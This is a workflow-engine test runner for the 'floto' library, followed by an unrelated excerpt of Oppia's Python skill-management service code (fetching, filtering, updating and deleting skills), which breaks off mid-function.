from deciders.test_14 import test_14
from deciders.test_15 import test_15
from deciders.test_16 import test_16
from deciders.test_17 import test_17
from test_helper import get_activity_result, docprint, print_result, print_details
from activity_worker import ActivityWorkerProcess
worker1 = ActivityWorkerProcess(domain='floto_test', task_list='floto_activities')
worker2 = ActivityWorkerProcess(domain='floto_test', task_list='floto_activities')
worker1.start()
worker2.start()
@docprint
def run_01():
"""
Test 01
Single task with context
"""
result = test_01()
result_activity_1 = get_activity_result(result, 'activity1', 'v5')
print_result(result)
assert result_activity_1['workflow'] == {'foo': 'bar'}
assert result_activity_1['status'] == 'finished'
@docprint
def run_02():
"""Test 02
Single task without context
"""
result = test_02()
result_activity_2 = get_activity_result(result, 'activity2', 'v4')
print_result(result)
assert result_activity_2['status'] == 'finished'
@docprint
def run_03():
"""Test 03
Two tasks without dependency, run in parallel if > 1 worker
"""
result = test_03()
result1 = get_activity_result(result, 'activity1', 'v5')
result2 = get_activity_result(result, 'activity2', 'v4')
print_result(result)
assert result1['workflow'] == {'foo': 'bar'}
assert result1['status'] == 'finished'
assert result2['status'] == 'finished'
@docprint
def run_04():
"""Test 04
Two tasks with 1 -> 3
"""
result = test_04()
result3 = get_activity_result(result, 'activity3', 'v2')
print_result(result)
assert result3['activity1']['status'] == 'finished'
assert result3['activity1']['workflow'] == {'foo': 'bar'}
assert result3['status'] == 'finished'
@docprint
def run_05():
"""Test 05
Failing task with retry strategy, succeeds after retry
"""
result = test_05()
result3 = get_activity_result(result, 'activity_fails_3', 'v2')
print_result(result)
assert result3['workflow_input'] == {'foo': 'bar'}
assert result3['status'] == 'finished'
@docprint
def run_06():
"""Test 06
Failing task with retry strategy, reaches limit of retries
"""
details = test_06()
details2 = get_activity_result(details, 'activity_fails_2', 'v2')
print_details(details)
assert details2 == 'Something went wrong'
@docprint
def run_07():
"""Test 07
Timeout
"""
result = test_07()
result2 = get_activity_result(result, 'activity2', 'v4')
print_result(result)
assert result2['status'] == 'finished'
@docprint
def run_08():
"""Test 08
Repeated Workflow
"""
result = test_08()
print_result(result)
result1 = get_activity_result(result, 'activity1', 'v5')
assert result1['status'] == 'finished'
@docprint
def run_09():
"""Test 09
Repeated Workflow with timer and failing activity with retries
"""
result = test_09()
print_result(result)
result4 = get_activity_result(result, 'activity4', 'v2')
assert [r for r in result4.keys() if 'activity1' in r]
assert [r for r in result4.keys() if 'activity2' in r]
@docprint
def run_10():
"""Test 10
Testing heartbeat: Heartbeat(20s) < execution time of activity5_v2 (30s)
"""
result = test_10()
result = get_activity_result(result, 'activity5', 'v2')
print('Result: ' + json.dumps(result) + '\n')
assert result['status'] == 'finished'
@docprint
def run_11():
"""Test 11
Decider times out, succeeds after next decision task
Prints a warning due to Decider timeout
"""
result = test_11()
result = get_activity_result(result, 'activity1', 'v5')
print('Result: ' + json.dumps(result) + '\n')
assert result['workflow'] == {'foo': 'bar'}
assert result['status'] == 'finished'
@docprint
def run_12():
"""Test 12
run_09 with 2 parallel deciders
"""
result = test_12()
result = get_activity_result(result, 'activity4', 'v2')
print('Result: ' + json.dumps(result) + '\n')
assert [r for r in result.keys() if 'activity1' in r]
assert [r for r in result.keys() if 'activity2' in r]
@docprint
def run_13():
"""Test 13
Two parallel deciders, one of them times out
"""
result = test_13()
print_result(result)
result4 = get_activity_result(result, 'activity4', 'v2')
assert [r for r in result4.keys() if 'activity1' in r]
assert [r for r in result4.keys() if 'activity2' in r]
@docprint
def run_14():
"""Test 14
Simple test with child workflow
"""
result = test_14()
print_result(result)
result_cw = get_activity_result(result, 'test_child_workflow', 'v2')
assert [r for r in result_cw.keys() if 'activity2' in r]
@docprint
def run_15():
"""Test 15
Workflow schedules a child workflow.
"""
result = test_15()
print_result(result)
result_child_workflow = get_activity_result(result, 'test_child_workflow', 'v2')
result_activity = get_activity_result(result_child_workflow, 'activity1', 'v5')
assert result_activity['status'] == 'finished'
@docprint
def run_16():
"""Test 16
Failing Task in ChildWorkflow
"""
result = test_16()
print_result(result)
result_child_workflow = get_activity_result(result, 'test_child_workflow', 'v2')
result_activity = get_activity_result(result_child_workflow, 'activity_fails_2', 'v2')
assert result_activity == 'Something went wrong'
@docprint
def run_17():
"""Test 17
Activity generates tasks. Tow deciders, one times out.
"""
result = test_17()
print_result(result)
result_activity_6 = get_activity_result(result, 'activity6', 'v1')
assert set(result_activity_6) == set(['a.in', 'b.in'])
tests = [run_01, run_02, run_03, run_04, run_05, run_06, run_07, run_08, run_09, run_10, run_11,
run_12, run_13, run_14, run_15, run_16, run_17]
try:
[t() for t in tests]
except (KeyboardInterrupt, SystemExit):
worker1.terminate()
worker2.terminate()
print()
print('All workflows finished successfully.')
worker1.terminate()
worker2.terminate()
|
|
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Commands that can be used to operate on skills."""
from __future__ import annotations
import collections
import logging
from core import feconf
from core.constants import constants
from core.domain import caching_services
from core.domain import config_domain
from core.domain import html_cleaner
from core.domain import opportunity_services
from core.domain import role_services
from core.domain import skill_domain
from core.domain import skill_fetchers
from core.domain import state_domain
from core.domain import suggestion_services
from core.domain import taskqueue_services
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
(skill_models, user_models, question_models, topic_models) = (
models.Registry.import_models([
models.NAMES.skill, models.NAMES.user, models.NAMES.question,
models.NAMES.topic]))
datastore_services = models.Registry.import_datastore_services()
# Repository GET methods.
def get_merged_skill_ids():
"""Returns the skill IDs of skills that have been merged.
Returns:
list(str). List of skill IDs of merged skills.
"""
return [skill.id for skill in skill_models.SkillModel.get_merged_skills()]
def get_all_skill_summaries():
"""Returns the summaries of all skills present in the datastore.
Returns:
list(SkillSummary). The list of summaries of all skills present in the
datastore.
"""
skill_summaries_models = skill_models.SkillSummaryModel.get_all()
skill_summaries = [
get_skill_summary_from_model(summary)
for summary in skill_summaries_models]
return skill_summaries
def _get_skill_summaries_in_batches(
num_skills_to_fetch, urlsafe_start_cursor, sort_by):
"""Returns the summaries of skills present in the datastore.
Args:
num_skills_to_fetch: int. Number of skills to fetch.
urlsafe_start_cursor: str or None. The cursor to the next page.
sort_by: str. A string indicating how to sort the result.
Returns:
3-tuple(skill_summaries, new_urlsafe_start_cursor, more). where:
skill_summaries: list(SkillSummary). The list of skill summaries.
The number of returned skill summaries might include more than
the requested number. Hence, the cursor returned will represent
the point to which those results were fetched (and not the
"num_skills_to_fetch" point).
urlsafe_start_cursor: str or None. A query cursor pointing to the
next batch of results. If there are no more results, this might
be None.
more: bool. If True, there are (probably) more results after this
batch. If False, there are no further results after this batch.
"""
# The fetched skills will be filtered afterwards and filtering may result
# in having less number of skills than requested. Hence, fetching twice
# the number of requested skills will help reduce the number of datastore
# calls.
skill_summaries_models, new_urlsafe_start_cursor, more = (
skill_models.SkillSummaryModel.fetch_page(
2 * num_skills_to_fetch, urlsafe_start_cursor, sort_by))
skill_summaries = [
get_skill_summary_from_model(summary)
for summary in skill_summaries_models]
return skill_summaries, new_urlsafe_start_cursor, more
def get_filtered_skill_summaries(
num_skills_to_fetch, status, classroom_name, keywords,
sort_by, urlsafe_start_cursor):
"""Returns all the skill summary dicts after filtering.
Args:
num_skills_to_fetch: int. Number of skills to fetch.
status: str. The status of the skill.
classroom_name: str. The classroom_name of the topic to which the skill
is assigned to.
keywords: list(str). The keywords to look for
in the skill description.
sort_by: str. A string indicating how to sort the result.
urlsafe_start_cursor: str or None. The cursor to the next page.
Returns:
3-tuple(augmented_skill_summaries, new_urlsafe_start_cursor, more).
Where:
augmented_skill_summaries: list(AugmentedSkillSummary). The list of
augmented skill summaries. The number of returned skills might
include more than the requested number. Hence, the cursor
returned will represent the point to which those results were
fetched (and not the "num_skills_to_fetch" point).
new_urlsafe_start_cursor: str or None. A query cursor pointing to
the next batch of results. If there are no more results, this
might be None.
more: bool. If True, there are (probably) more results after this
batch. If False, there are no further results after this batch.
"""
augmented_skill_summaries = []
new_urlsafe_start_cursor = urlsafe_start_cursor
more = True
while len(augmented_skill_summaries) < num_skills_to_fetch and more:
augmented_skill_summaries_batch, new_urlsafe_start_cursor, more = (
_get_augmented_skill_summaries_in_batches(
num_skills_to_fetch, new_urlsafe_start_cursor, sort_by))
filtered_augmented_skill_summaries = _filter_skills_by_status(
augmented_skill_summaries_batch, status)
filtered_augmented_skill_summaries = _filter_skills_by_classroom(
filtered_augmented_skill_summaries, classroom_name)
filtered_augmented_skill_summaries = _filter_skills_by_keywords(
filtered_augmented_skill_summaries, keywords)
augmented_skill_summaries.extend(filtered_augmented_skill_summaries)
return augmented_skill_summaries, new_urlsafe_start_cursor, more
def _get_augmented_skill_summaries_in_batches(
num_skills_to_fetch, urlsafe_start_cursor, sort_by):
"""Returns all the Augmented skill summaries after attaching
topic and classroom.
Returns:
3-tuple(augmented_skill_summaries, urlsafe_start_cursor, more). Where:
augmented_skill_summaries: list(AugmentedSkillSummary). The list of
skill summaries.
urlsafe_start_cursor: str or None. A query cursor pointing to the
next batch of results. If there are no more results, this might
be None.
more: bool. If True, there are (probably) more results after this
batch. If False, there are no further results after this batch.
"""
skill_summaries, new_urlsafe_start_cursor, more = (
_get_skill_summaries_in_batches(
num_skills_to_fetch, urlsafe_start_cursor, sort_by))
assigned_skill_ids = collections.defaultdict(lambda: {
'topic_names': [],
'classroom_names': []
})
all_topic_models = topic_models.TopicModel.get_all()
all_topics = [topic_fetchers.get_topic_from_model(topic_model)
if topic_model is not None else None
for topic_model in all_topic_models]
topic_classroom_dict = {}
all_classrooms_dict = config_domain.CLASSROOM_PAGES_DATA.value
for classroom in all_classrooms_dict:
for topic_id in classroom['topic_ids']:
topic_classroom_dict[topic_id] = classroom['name']
for topic in all_topics:
for skill_id in topic.get_all_skill_ids():
assigned_skill_ids[skill_id]['topic_names'].append(topic.name)
assigned_skill_ids[skill_id]['classroom_names'].append(
topic_classroom_dict.get(topic.id, None))
augmented_skill_summaries = []
for skill_summary in skill_summaries:
topic_names = []
classroom_names = []
if skill_summary.id in assigned_skill_ids:
topic_names = assigned_skill_ids[skill_summary.id]['topic_names']
classroom_names = (
assigned_skill_ids[skill_summary.id]['classroom_names'])
augmented_skill_summary = skill_domain.AugmentedSkillSummary(
skill_summary.id,
skill_summary.description,
skill_summary.language_code,
skill_summary.version,
skill_summary.misconception_count,
skill_summary.worked_examples_count,
topic_names,
classroom_names,
skill_summary.skill_model_created_on,
skill_summary.skill_model_last_updated)
augmented_skill_summaries.append(augmented_skill_summary)
return augmented_skill_summaries, new_urlsafe_start_cursor, more
def _filter_skills_by_status(augmented_skill_summaries, status):
"""Returns the skill summary dicts after filtering by status.
Args:
augmented_skill_summaries: list(AugmentedSkillSummary). The list
of augmented skill summaries.
status: str. The status of the skill.
Returns:
list(AugmentedSkillSummary). The list of AugmentedSkillSummaries
matching the given status.
"""
if status is None or status == constants.SKILL_STATUS_OPTIONS['ALL']:
return augmented_skill_summaries
elif status == constants.SKILL_STATUS_OPTIONS['UNASSIGNED']:
unassigned_augmented_skill_summaries = []
for augmented_skill_summary in augmented_skill_summaries:
if not augmented_skill_summary.topic_names:
unassigned_augmented_skill_summaries.append(
augmented_skill_summary)
return unassigned_augmented_skill_summaries
elif status == constants.SKILL_STATUS_OPTIONS['ASSIGNED']:
assigned_augmented_skill_summaries = []
for augmented_skill_summary in augmented_skill_summaries:
if augmented_skill_summary.topic_names:
assigned_augmented_skill_summaries.append(
augmented_skill_summary)
return assigned_augmented_skill_summaries
def _filter_skills_by_classroom(augmented_skill_summaries, classroom_name):
"""Returns the skill summary dicts after filtering by classroom_name.
Args:
augmented_skill_summaries: list(AugmentedSkillSummary).
The list of augmented skill summaries.
classroom_name: str. The classroom_name of the topic to which the skill
is assigned to.
Returns:
list(AugmentedSkillSummary). The list of augmented skill summaries with
the given classroom name.
"""
if classroom_name is None or classroom_name == 'All':
return augmented_skill_summaries
augmented_skill_summaries_with_classroom_name = []
for augmented_skill_summary in augmented_skill_summaries:
if classroom_name in augmented_skill_summary.classroom_names:
augmented_skill_summaries_with_classroom_name.append(
augmented_skill_summary)
return augmented_skill_summaries_with_classroom_name
def _filter_skills_by_keywords(augmented_skill_summaries, keywords):
"""Returns whether the keywords match the skill description.
Args:
augmented_skill_summaries: list(AugmentedSkillSummary). The augmented
skill summaries.
keywords: list(str). The keywords to match.
Returns:
list(AugmentedSkillSummary). The list of augmented skill summaries
matching the given keywords.
"""
if not keywords:
return augmented_skill_summaries
filtered_augmented_skill_summaries = []
for augmented_skill_summary in augmented_skill_summaries:
if any((augmented_skill_summary.description.lower().find(
keyword.lower()) != -1) for keyword in keywords):
filtered_augmented_skill_summaries.append(augmented_skill_summary)
return filtered_augmented_skill_summaries
def get_multi_skill_summaries(skill_ids):
"""Returns a list of skill summaries matching the skill IDs provided.
Args:
skill_ids: list(str). List of skill IDs to get skill summaries for.
Returns:
list(SkillSummary). The list of summaries of skills matching the
provided IDs.
"""
skill_summaries_models = skill_models.SkillSummaryModel.get_multi(skill_ids)
skill_summaries = [
get_skill_summary_from_model(skill_summary_model)
for skill_summary_model in skill_summaries_models
if skill_summary_model is not None]
return skill_summaries
def get_rubrics_of_skills(skill_ids):
"""Returns a list of rubrics corresponding to given skills.
Args:
skill_ids: list(str). The list of skill IDs.
Returns:
dict, list(str). The skill rubrics of skills keyed by their
corresponding ids and the list of deleted skill ids, if any.
"""
skills = skill_fetchers.get_multi_skills(skill_ids, strict=False)
skill_id_to_rubrics_dict = {}
for skill in skills:
if skill is not None:
rubric_dicts = [rubric.to_dict() for rubric in skill.rubrics]
skill_id_to_rubrics_dict[skill.id] = rubric_dicts
deleted_skill_ids = []
for skill_id in skill_ids:
if skill_id not in skill_id_to_rubrics_dict:
skill_id_to_rubrics_dict[skill_id] = None
deleted_skill_ids.append(skill_id)
return skill_id_to_rubrics_dict, deleted_skill_ids
def get_descriptions_of_skills(skill_ids):
"""Returns a list of skill descriptions corresponding to the given skills.
Args:
skill_ids: list(str). The list of skill ids.
Returns:
dict, list(str). The skill descriptions of skills keyed by their
corresponding ids and the list of deleted skill ids, if any.
"""
skill_summaries = get_multi_skill_summaries(skill_ids)
skill_id_to_description_dict = {}
for skill_summary in skill_summaries:
if skill_summary is not None:
skill_id_to_description_dict[skill_summary.id] = (
skill_summary.description)
deleted_skill_ids = []
for skill_id in skill_ids:
if skill_id not in skill_id_to_description_dict:
skill_id_to_description_dict[skill_id] = None
deleted_skill_ids.append(skill_id)
return skill_id_to_description_dict, deleted_skill_ids
def get_skill_summary_from_model(skill_summary_model):
"""Returns a domain object for an Oppia skill summary given a
skill summary model.
Args:
skill_summary_model: SkillSummaryModel. The skill summary model object
to get corresponding domain object.
Returns:
SkillSummary. The domain object corresponding to given skill summmary
model.
"""
return skill_domain.SkillSummary(
skill_summary_model.id, skill_summary_model.description,
skill_summary_model.language_code,
skill_summary_model.version,
skill_summary_model.misconception_count,
skill_summary_model.worked_examples_count,
skill_summary_model.skill_model_created_on,
skill_summary_model.skill_model_last_updated
)
def get_image_filenames_from_skill(skill):
"""Get the image filenames from the skill.
Args:
skill: Skill. The skill itself.
Returns:
list(str). List containing the name of the image files in skill.
"""
html_list = skill.get_all_html_content_strings()
return html_cleaner.get_image_filenames_from_html_strings(html_list)
def get_all_topic_assignments_for_skill(skill_id):
"""Returns a list containing all the topics to which the given skill is
assigned along with topic details.
Args:
skill_id: str. ID of the skill.
Returns:
list(TopicAssignment). A list of TopicAssignment domain objects.
"""
topic_assignments = []
topics = topic_fetchers.get_all_topics()
for topic in topics:
if skill_id in topic.get_all_skill_ids():
subtopic_id = None
for subtopic in topic.subtopics:
if skill_id in subtopic.skill_ids:
subtopic_id = subtopic.id
break
topic_assignments.append(skill_domain.TopicAssignment(
topic.id, topic.name, topic.version, subtopic_id))
return topic_assignments
def replace_skill_id_in_all_topics(user_id, old_skill_id, new_skill_id):
"""Replaces the old skill id with the new one in all the associated topics.
Args:
user_id: str. The unique user ID of the user.
old_skill_id: str. The old skill id.
new_skill_id: str. The new skill id.
"""
all_topics = topic_fetchers.get_all_topics()
for topic in all_topics:
change_list = []
if old_skill_id in topic.get_all_skill_ids():
if new_skill_id in topic.get_all_skill_ids():
raise Exception(
'Found topic \'%s\' contains the two skills to be merged. '
'Please unassign one of these skills from topic '
'and retry this operation.' % topic.name)
if old_skill_id in topic.uncategorized_skill_ids:
change_list.extend([topic_domain.TopicChange({
'cmd': 'remove_uncategorized_skill_id',
'uncategorized_skill_id': old_skill_id
}), topic_domain.TopicChange({
'cmd': 'add_uncategorized_skill_id',
'new_uncategorized_skill_id': new_skill_id
})])
for subtopic in topic.subtopics:
if old_skill_id in subtopic.skill_ids:
change_list.extend([topic_domain.TopicChange({
'cmd': topic_domain.CMD_REMOVE_SKILL_ID_FROM_SUBTOPIC,
'subtopic_id': subtopic.id,
'skill_id': old_skill_id
}), topic_domain.TopicChange({
'cmd': 'remove_uncategorized_skill_id',
'uncategorized_skill_id': old_skill_id
}), topic_domain.TopicChange({
'cmd': 'add_uncategorized_skill_id',
'new_uncategorized_skill_id': new_skill_id
}), topic_domain.TopicChange({
'cmd': topic_domain.CMD_MOVE_SKILL_ID_TO_SUBTOPIC,
'old_subtopic_id': None,
'new_subtopic_id': subtopic.id,
'skill_id': new_skill_id
})])
break
topic_services.update_topic_and_subtopic_pages(
user_id, topic.id, change_list,
'Replace skill id %s with skill id %s in the topic' % (
old_skill_id, new_skill_id))
def remove_skill_from_all_topics(user_id, skill_id):
"""Deletes the skill with the given id from all the associated topics.
Args:
user_id: str. The unique user ID of the user.
skill_id: str. ID of the skill.
"""
all_topics = topic_fetchers.get_all_topics()
for topic in all_topics:
change_list = []
if skill_id in topic.get_all_skill_ids():
for subtopic in topic.subtopics:
if skill_id in subtopic.skill_ids:
change_list.append(topic_domain.TopicChange({
'cmd': 'remove_skill_id_from_subtopic',
'subtopic_id': subtopic.id,
'skill_id': skill_id
}))
break
change_list.append(topic_domain.TopicChange({
'cmd': 'remove_uncategorized_skill_id',
'uncategorized_skill_id': skill_id
}))
skill_name = get_skill_summary_by_id(skill_id).description
topic_services.update_topic_and_subtopic_pages(
user_id, topic.id, change_list,
'Removed skill with id %s and name %s from the topic' % (
skill_id, skill_name))
def get_skill_summary_by_id(skill_id, strict=True):
"""Returns a domain object representing a skill summary.
Args:
skill_id: str. ID of the skill summary.
strict: bool. Whether to fail noisily if no skill summary with the given
id exists in the datastore.
Returns:
SkillSummary. The skill summary domain object corresponding to a skill
with the given skill_id.
"""
skill_summary_model = skill_models.SkillSummaryModel.get(
skill_id, strict=strict)
if skill_summary_model:
skill_summary = get_skill_summary_from_model(
skill_summary_model)
return skill_summary
else:
return None
def get_new_skill_id():
"""Returns a new skill id.
Returns:
str. A new skill id.
"""
return skill_models.SkillModel.get_new_id('')
def _create_skill(committer_id, skill, commit_message, commit_cmds):
"""Creates a new skill.
Args:
committer_id: str. ID of the committer.
skill: Skill. The skill domain object.
commit_message: str. A description of changes made to the skill.
commit_cmds: list(SkillChange). A list of change commands made to the
given skill.
"""
skill.validate()
model = skill_models.SkillModel(
id=skill.id,
description=skill.description,
language_code=skill.language_code,
misconceptions=[
misconception.to_dict()
for misconception in skill.misconceptions
],
rubrics=[
rubric.to_dict()
for rubric in skill.rubrics
],
skill_contents=skill.skill_contents.to_dict(),
next_misconception_id=skill.next_misconception_id,
misconceptions_schema_version=skill.misconceptions_schema_version,
rubric_schema_version=skill.rubric_schema_version,
skill_contents_schema_version=skill.skill_contents_schema_version,
superseding_skill_id=skill.superseding_skill_id,
all_questions_merged=skill.all_questions_merged,
prerequisite_skill_ids=skill.prerequisite_skill_ids
)
commit_cmd_dicts = [commit_cmd.to_dict() for commit_cmd in commit_cmds]
model.commit(committer_id, commit_message, commit_cmd_dicts)
skill.version += 1
create_skill_summary(skill.id)
opportunity_services.create_skill_opportunity(
skill.id,
skill.description)
def does_skill_with_description_exist(description):
"""Checks if skill with provided description exists.
Args:
description: str. The description for the skill.
Returns:
bool. Whether the the description for the skill exists.
"""
existing_skill = (
skill_fetchers.get_skill_by_description(description))
return existing_skill is not None
def save_new_skill(committer_id, skill):
"""Saves a new skill.
Args:
committer_id: str. ID of the committer.
skill: Skill. Skill to be saved.
"""
commit_message = 'New skill created.'
_create_skill(
committer_id, skill, commit_message, [skill_domain.SkillChange({
'cmd': skill_domain.CMD_CREATE_NEW
})])
def apply_change_list(skill_id, change_list, committer_id):
"""Applies a changelist to a skill and returns the result.
Args:
skill_id: str. ID of the given skill.
change_list: list(SkillChange). A change list to be applied to the given
skill.
committer_id: str. The ID of the committer of this change list.
Returns:
Skill. The resulting skill domain object.
"""
skill = skill_fetchers.get_skill_by_id(skill_id)
user = user_services.get_user_actions_info(committer_id)
try:
for change in change_list:
if change.cmd == skill_domain.CMD_UPDATE_SKILL_PROPERTY:
if (change.property_name ==
skill_domain.SKILL_PROPERTY_DESCRIPTION):
if role_services.ACTION_EDIT_SKILL_DESCRIPTION not in (
user.actions):
raise Exception(
'The user does not have enough rights to edit the '
'skill description.')
skill.update_description(change.new_value)
(
opportunity_services
.update_skill_opportunity_skill_description(
skill.id, change.new_value))
elif (change.property_name ==
skill_domain.SKILL_PROPERTY_LANGUAGE_CODE):
skill.update_language_code(change.new_value)
elif (change.property_name ==
skill_domain.SKILL_PROPERTY_SUPERSEDING_SKILL_ID):
skill.update_superseding_skill_id(change.new_value)
elif (change.property_name ==
skill_domain.SKILL_PROPERTY_ALL_QUESTIONS_MERGED):
skill.record_that_all_questions_are_merged(change.new_value)
elif change.cmd == skill_domain.CMD_UPDATE_SKILL_CONTENTS_PROPERTY:
if (change.property_name ==
skill_domain.SKILL_CONTENTS_PROPERTY_EXPLANATION):
explanation = (
state_domain.SubtitledHtml.from_dict(change.new_value))
explanation.validate()
skill.update_explanation(explanation)
elif (change.property_name ==
skill_domain.SKILL_CONTENTS_PROPERTY_WORKED_EXAMPLES):
worked_examples_list = [
skill_domain.WorkedExample.from_dict(worked_example)
for worked_example in change.new_value]
skill.update_worked_examples(worked_examples_list)
elif change.cmd == skill_domain.CMD_ADD_SKILL_MISCONCEPTION:
misconception = skill_domain.Misconception.from_dict(
change.new_misconception_dict)
skill.add_misconception(misconception)
elif change.cmd == skill_domain.CMD_DELETE_SKILL_MISCONCEPTION:
skill.delete_misconception(change.misconception_id)
elif change.cmd == skill_domain.CMD_ADD_PREREQUISITE_SKILL:
skill.add_prerequisite_skill(change.skill_id)
elif change.cmd == skill_domain.CMD_DELETE_PREREQUISITE_SKILL:
skill.delete_prerequisite_skill(change.skill_id)
elif change.cmd == skill_domain.CMD_UPDATE_RUBRICS:
skill.update_rubric(
change.difficulty, change.explanations)
elif (change.cmd ==
skill_domain.CMD_UPDATE_SKILL_MISCONCEPTIONS_PROPERTY):
if (change.property_name ==
skill_domain.SKILL_MISCONCEPTIONS_PROPERTY_NAME):
skill.update_misconception_name(
change.misconception_id, change.new_value)
elif (change.property_name ==
skill_domain.SKILL_MISCONCEPTIONS_PROPERTY_NOTES):
skill.update_misconception_notes(
change.misconception_id, change.new_value)
elif (change.property_name ==
skill_domain.SKILL_MISCONCEPTIONS_PROPERTY_FEEDBACK):
skill.update_misconception_feedback(
change.misconception_id, change.new_value)
elif (change.property_name ==
skill_domain.SKILL_MISCONCEPTIONS_PROPERTY_MUST_BE_ADDRESSED): # pylint: disable=line-too-long
skill.update_misconception_must_be_addressed(
change.misconception_id, change.new_value)
else:
raise Exception('Invalid change dict.')
elif (change.cmd in (
skill_domain.CMD_MIGRATE_CONTENTS_SCHEMA_TO_LATEST_VERSION,
skill_domain.CMD_MIGRATE_MISCONCEPTIONS_SCHEMA_TO_LATEST_VERSION, # pylint: disable=line-too-long
skill_domain.CMD_MIGRATE_RUBRICS_SCHEMA_TO_LATEST_VERSION
)):
# Loading the skill model from the datastore into a
# skill domain object automatically converts it to use the
# latest schema version. As a result, simply resaving the
# skill is sufficient to apply the schema migration.
continue
return skill
except Exception as e:
logging.error(
'%s %s %s %s' % (
e.__class__.__name__, e, skill_id, change_list)
)
raise e
def populate_skill_model_fields(skill_model, skill):
"""Populate skill model with the data from skill object.
Args:
skill_model: SkillModel. The model to populate.
skill: Skill. The skill domain object which should be used to
populate the model.
Returns:
SkillModel. Populated model.
"""
skill_model.description = skill.description
skill_model.language_code = skill.language_code
skill_model.superseding_skill_id = skill.superseding_skill_id
skill_model.all_questions_merged = skill.all_questions_merged
skill_model.prerequisite_skill_ids = skill.prerequisite_skill_ids
skill_model.misconceptions_schema_version = (
skill.misconceptions_schema_version)
skill_model.rubric_schema_version = (
skill.rubric_schema_version)
skill_model.skill_contents_schema_version = (
skill.skill_contents_schema_version)
skill_model.skill_contents = skill.skill_contents.to_dict()
skill_model.misconceptions = [
misconception.to_dict() for misconception in skill.misconceptions
]
skill_model.rubrics = [
rubric.to_dict() for rubric in skill.rubrics
]
skill_model.next_misconception_id = skill.next_misconception_id
return skill_model
def _save_skill(committer_id, skill, commit_message, change_list):
"""Validates a skill and commits it to persistent storage. If
successful, increments the version number of the incoming skill domain
object by 1.
Args:
committer_id: str. ID of the given committer.
skill: Skill. The skill domain object to be saved.
commit_message: str. The commit message.
change_list: list(SkillChange). List of changes applied to a skill.
Raises:
Exception. The skill model and the incoming skill domain object have
different version numbers.
Exception. Received invalid change list.
"""
if not change_list:
raise Exception(
'Unexpected error: received an invalid change list when trying to '
'save skill %s: %s' % (skill.id, change_list))
skill.validate()
# Skill model cannot be None as skill is passed as parameter here and that
# is only possible if a skill model with that skill id exists.
skill_model = skill_models.SkillModel.get(
skill.id, strict=False)
if skill.version > skill_model.version:
raise Exception(
'Unexpected error: trying to update version %s of skill '
'from version %s. Please reload the page and try again.'
% (skill_model.version, skill.version))
if skill.version < skill_model.version:
raise Exception(
'Trying to update version %s of skill from version %s, '
'which is too old. Please reload the page and try again.'
% (skill_model.version, skill.version))
skill_model = populate_skill_model_fields(skill_model, skill)
change_dicts = [change.to_dict() for change in change_list]
skill_model.commit(committer_id, commit_message, change_dicts)
caching_services.delete_multi(
caching_services.CACHE_NAMESPACE_SKILL, None, [skill.id])
skill.version += 1
def update_skill(committer_id, skill_id, change_list, commit_message):
"""Updates a skill. Commits changes.
Args:
committer_id: str. The id of the user who is performing the update
action.
skill_id: str. The skill id.
change_list: list(SkillChange). These changes are applied in sequence to
produce the resulting skill.
commit_message: str or None. A description of changes made to the
skill. For published skills, this must be present; for
unpublished skills, it may be equal to None.
Raises:
ValueError. No commit message was provided.
"""
if not commit_message:
raise ValueError(
'Expected a commit message, received none.')
skill = apply_change_list(skill_id, change_list, committer_id)
_save_skill(committer_id, skill, commit_message, change_list)
create_skill_summary(skill.id)
misconception_is_deleted = any(
change.cmd == skill_domain.CMD_DELETE_SKILL_MISCONCEPTION
for change in change_list
)
if misconception_is_deleted:
deleted_skill_misconception_ids = [
skill.generate_skill_misconception_id(change.misconception_id)
for change in change_list
if change.cmd == skill_domain.CMD_DELETE_SKILL_MISCONCEPTION
]
taskqueue_services.defer(
taskqueue_services.FUNCTION_ID_UNTAG_DELETED_MISCONCEPTIONS,
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS,
committer_id, skill_id, skill.description,
deleted_skill_misconception_ids)
def delete_skill(committer_id, skill_id, force_deletion=False):
"""Deletes the skill with the given skill_id.
Args:
committer_id: str. ID of the committer.
skill_id: str. ID of the skill to be deleted.
force_deletion: bool. If true, the skill and its history are fully
deleted and are unrecoverable. Otherwise, the skill and all
its history are marked as deleted, but the corresponding models are
still retained in the datastore. This last option is the preferred
one.
"""
skill_models.SkillModel.delete_multi(
[skill_id], committer_id, '', force_deletion=force_deletion)
# This must come after the skill is retrieved. Otherwise the memcache
# key will be reinstated.
caching_services.delete_multi(
caching_services.CACHE_NAMESPACE_SKILL, None, [skill_id])
# Delete the summary of the skill (regardless of whether
# force_deletion is True or not).
delete_skill_summary(skill_id)
opportunity_services.delete_skill_opportunity(skill_id)
suggestion_services.auto_reject_question_suggestions_for_skill_id(
skill_id)
def delete_skill_summary(skill_id):
"""Delete a skill summary model.
Args:
skill_id: str. ID of the skill whose skill summary is to
be deleted.
"""
skill_summary_model = (
skill_models.SkillSummaryModel.get(skill_id, False))
if skill_summary_model is not None:
skill_summary_model.delete()
def compute_summary_of_skill(skill):
"""Create a SkillSummary domain object for a given Skill domain
object and return it.
Args:
skill: Skill. The skill object, for which the summary is to be computed.
Returns:
SkillSummary. The computed summary for the given skill.
"""
skill_model_misconception_count = len(skill.misconceptions)
skill_model_worked_examples_count = len(
skill.skill_contents.worked_examples)
skill_summary = skill_domain.SkillSummary(
skill.id, skill.description, skill.language_code,
skill.version, skill_model_misconception_count,
skill_model_worked_examples_count,
skill.created_on, skill.last_updated
)
return skill_summary
def create_skill_summary(skill_id):
"""Creates and stores a summary of the given skill.
Args:
skill_id: str. ID of the skill.
"""
skill = skill_fetchers.get_skill_by_id(skill_id)
skill_summary = compute_summary_of_skill(skill)
save_skill_summary(skill_summary)
def populate_skill_summary_model_fields(skill_summary_model, skill_summary):
"""Populate skill summary model with the data from skill summary object.
Args:
skill_summary_model: SkillSummaryModel. The model to populate.
skill_summary: SkillSummary. The skill summary domain object which
should be used to populate the model.
Returns:
SkillSummaryModel. Populated model.
"""
skill_summary_dict = {
'description': skill_summary.description,
'language_code': skill_summary.language_code,
'version': skill_summary.version,
